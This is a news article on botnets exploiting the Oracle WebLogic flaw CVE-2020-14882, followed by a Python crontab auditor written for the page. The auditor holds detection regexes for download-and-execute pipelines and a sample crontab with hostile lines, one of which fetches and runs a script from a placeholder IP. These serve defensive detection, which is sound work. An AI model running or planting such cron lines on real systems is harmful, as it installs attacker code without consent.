Multiple botnets are targeting thousands of publicly exposed and still unpatched Oracle WebLogic servers to deploy cryptocurrency miners and steal sensitive information from infected systems.
The attacks target a recently patched WebLogic Server vulnerability that Oracle fixed in its October 2020 Critical Patch Update and then again in November (CVE-2020-14750) in the form of an out-of-band security update.
As of this writing, about 3,000 Oracle WebLogic servers are reachable on the Internet, based on statistics from the Shodan search engine.
Oracle WebLogic is a platform for developing, deploying and running enterprise Java applications in any cloud environment as well as on-premises.
The flaw, tracked as CVE-2020-14882, has a CVSS score of 9.8 out of a maximum of 10 and affects WebLogic Server versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0.
Although the issue has been patched, the release of proof-of-concept exploit code has made vulnerable Oracle WebLogic servers a lucrative target for threat actors, who recruit them into botnets that harvest critical data and deploy second-stage malware payloads.
According to Juniper Threat Labs, the operators of the DarkIRC botnet exploit this RCE vulnerability to move laterally across the network, download files, log keystrokes, steal credentials, and execute arbitrary commands on compromised machines.
The malware also acts as a Bitcoin clipper: it swaps Bitcoin wallet addresses copied to the clipboard for the operator's wallet address, letting the attackers redirect Bitcoin transactions.
What's more, a threat actor going by "Freak_OG" has been selling the DarkIRC malware on hacking forums for $75 since August.
But DarkIRC is not the only malware exploiting the WebLogic Server vulnerability. In a separate campaign, spotted by '0xrb' and detailed by researcher Tolijan Trajanovski, evidence has emerged of a botnet that spreads through the WebLogic flaw to deliver a Monero cryptocurrency miner and Tsunami binaries.
Besides using SSH for lateral movement, the botnet has been found to establish persistence through cron jobs, kill competing miners, and even uninstall endpoint detection and response (EDR) tools from Alibaba and Tencent.
Users are advised to apply the October 2020 Critical Patch Update and the updates related to CVE-2020-14750 as soon as possible to mitigate the risks arising from this flaw.
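Cron-based persistence of the kind described above leaves a footprint that is cheap to audit. The following script is an added example written for this page, not code from the article or from the researchers it cites: it parses crontab text, scores each entry against a handful of indicators (download-and-execute pipelines, raw-IP URLs, base64 decoding, binaries in world-writable directories, process killing, very frequent schedules) and reports entries that look like botnet persistence. The indicator patterns, the scoring threshold and the sample crontab are assumptions constructed for the example; the IP address and file names in it are placeholders.

```python
"""Audit crontab entries for download-and-execute persistence patterns.

Added example for this page; indicator patterns and sample data are
constructed assumptions, not details taken from the article.
"""
import re
from dataclasses import dataclass, field

# Indicators evaluated against the command part of each cron entry.
# These reflect common cryptomining-botnet tradecraft in general (assumption),
# not behaviour the article attributes to a specific botnet.
COMMAND_INDICATORS = {
    "download_to_shell": re.compile(r"\b(?:curl|wget)\b[^|;&\n]*\|\s*(?:ba|da)?sh\b"),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b"),
    "base64_decode": re.compile(r"\bbase64\s+(?:-d|--decode)\b"),
    "temp_dir_binary": re.compile(r"(?:^|\s)/(?:tmp|dev/shm|var/tmp)/\S+"),
    "kills_processes": re.compile(r"\b(?:pkill|killall)\b"),
    "hides_output": re.compile(r">\s*/dev/null\s+2>&1"),
}

SPECIAL_SCHEDULES = {"@reboot", "@hourly", "@daily", "@weekly",
                     "@monthly", "@yearly", "@annually"}


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    indicators: list = field(default_factory=list)

    @property
    def score(self):
        return len(self.indicators)


def split_entry(line):
    """Return (schedule, command) for a cron entry; None for blanks, comments, VAR=... lines."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", stripped):
        return None
    if stripped.startswith("@"):
        parts = stripped.split(None, 1)
        if parts[0] in SPECIAL_SCHEDULES and len(parts) == 2:
            return parts[0], parts[1]
        return None
    parts = stripped.split(None, 5)
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def runs_every_few_minutes(schedule, max_minutes=5):
    """True for schedules firing at least every max_minutes ('* * * * *', '*/2 * * * *')."""
    if schedule.startswith("@"):
        return False
    minute = schedule.split()[0]
    if minute == "*":
        return True
    m = re.fullmatch(r"\*/(\d+)", minute)
    return bool(m) and int(m.group(1)) <= max_minutes


def audit_crontab(text):
    """Return Findings for entries that trip the download_to_shell indicator or score >= 2."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        hits = [name for name, rx in COMMAND_INDICATORS.items() if rx.search(command)]
        if runs_every_few_minutes(schedule):
            hits.append("high_frequency")       # tight re-download loops (assumption)
        if schedule == "@reboot":
            hits.append("reboot_persistence")   # survives restarts
        if "download_to_shell" in hits or len(hits) >= 2:
            findings.append(Finding(line_no, schedule, command, hits))
    return findings


# Constructed sample crontab: two benign entries, three that mimic botnet persistence.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/bin:/bin
# nightly log rotation (benign)
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
30 1 * * 0 /usr/local/bin/backup.sh >/dev/null 2>&1
*/2 * * * * curl -fsSL http://203.0.113.5/x.sh | sh
@reboot /dev/shm/.x/run >/dev/null 2>&1
0 * * * * pkill -9 -f miner; echo aGk= | base64 -d | sh
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: score {f.score} {f.indicators}\n    {f.schedule} {f.command}")
```

Run it against `crontab -l` output or the files under `/etc/cron.d` and `/var/spool/cron`; the benign `backup.sh` entry scores only one indicator (output redirection) and is not reported, while the three constructed malicious entries are flagged with two or three indicators each.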
Oracle has also provided instructions to harden the servers by preventing external access to internal applications available on the Administration port.